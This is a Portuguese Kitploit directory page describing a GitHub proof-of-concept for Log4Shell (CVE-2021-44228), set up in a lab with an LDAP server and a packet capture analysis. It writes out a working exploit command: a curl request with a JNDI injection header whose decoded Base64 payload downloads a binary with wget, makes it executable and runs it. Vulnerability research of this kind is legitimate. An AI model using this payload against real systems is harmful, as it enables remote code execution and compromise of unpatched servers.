Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
LOG4J-CVE-2021-44228 — Exploit de prova de conceito para Log4Shell (CVE-2021-44228) com configuração de servidor LDAP, geração de payload e análise de captura de pacotes para pesquisa educacional de vulnerabilidades. | Kitploit
Ferramentas/GitHubGitHub/sumitpathania03/log4j-cve-2021-44228
Sniffing e Análise de PacotesGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleArchived
GitHubsumitpathania03/log4j-cve-2021-44228

LOG4J-CVE-2021-44228

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de prova de conceito para Log4Shell (CVE-2021-44228) com configuração de servidor LDAP, geração de payload e análise de captura de pacotes para pesquisa educacional de vulnerabilidades.

Ver Repositório
há 3 anosAinda não revisado

LOG4J-CVE-2021-44228

Log4Shell — também conhecido como CVE-2021-44228 — é uma vulnerabilidade crítica que permite execução remota de código em sistemas que utilizam o Log4j da Apache Foundation, que é uma biblioteca Java de código aberto amplamente utilizada em produtos de software comerciais e de código aberto e utilitários.

0_6ImDNNYn_uGlIgog

Análise do PoC

O servidor vulnerável está rodando na porta 8080

Screenshot 2023-04-11 115553

E o servidor ldap está rodando em duas portas: http 8888 e ldap 1389

Screenshot 2023-04-11 115631

COMANDO DO EXPLOIT

curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'

{

172.17.0.2:8080 -- IP do servidor vulnerável

172.17.0.1:1389 -- IP do servidor LDAP

Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==

Comando descriptografado - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev

}

ANÁLISE DE PACOTES

PACKETS

flowgraph

COMO PODEMOS VER NOS PACOTES, O SERVIDOR ESTÁ ENVIANDO UMA REQUISIÇÃO GET PARA UMA CLASSE PARA O SERVIDOR LDAP. SE VERIFICARMOS A CLASSE DO EXPLOIT, PODEMOS VER QUE O SERVIDOR LDAP ESTÁ ENVIANDO O COMANDO DESCRIPTOGRAFADO NA CLASSE DO EXPLOIT.

EXP_CLASS

Referências

https://github.com/simrotion13/log4shell-vulnerable-app

https://github.com/black9/Log4shell_JNDIExploit.git

Baixar ferramenta